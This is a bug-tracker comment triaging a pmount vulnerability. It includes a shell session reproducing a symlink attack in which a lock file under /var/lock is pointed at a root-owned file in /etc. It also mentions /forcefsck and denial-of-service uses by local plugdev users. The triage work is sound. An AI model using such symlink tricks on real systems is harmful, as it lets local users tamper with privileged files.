Comment 1 for bug 574809

Dan, I can confirm this, but I don't see that pmount is altering the contents of the file if it already exists. Eg:
$ cat /etc/foo
test
$ stat /etc/foo
  File: `/etc/foo'
  Size: 5 Blocks: 8 IO Block: 4096 regular file
Device: fb01h/64257d Inode: 135724 Links: 1
Access: (0644/-rw-r--r--) Uid: ( 0/ root) Gid: ( 0/ root)
Access: 2010-06-05 12:07:30.580581903 +0000
Modify: 2010-06-05 12:05:57.868006989 +0000
Change: 2010-06-05 12:05:57.868006989 +0000

$ mkdir /var/lock/pmount_dev_sr0
$ ls -ld /var/lock/pmount_dev_sr0/
drwxr-xr-x 2 jamie jamie 40 2010-06-05 12:12 /var/lock/pmount_dev_sr0/

$ ln -s /etc/foo /var/lock/pmount_dev_sr0/1
$ ls -l /var/lock/pmount_dev_sr0/1
lrwxrwxrwx 1 jamie jamie 8 2010-06-05 12:13 /var/lock/pmount_dev_sr0/1 -> /etc/foo

$ pmount --lock /dev/sr0 1

$ cat /etc/foo
test
$ stat /etc/foo
  File: `/etc/foo'
  Size: 5 Blocks: 8 IO Block: 4096 regular file
Device: fb01h/64257d Inode: 135724 Links: 1
Access: (0644/-rw-r--r--) Uid: ( 0/ root) Gid: ( 0/ root)
Access: 2010-06-05 12:07:30.580581903 +0000
Modify: 2010-06-05 12:05:57.868006989 +0000
Change: 2010-06-05 12:05:57.868006989 +0000

I think I would characterize this as a 'Low' issue. A local attacker in the 'plugdev' group on Ubuntu could create things like /forcefsck or maybe fiddle with files in /var to DoS applications (eg, sockets, named pipes, etc).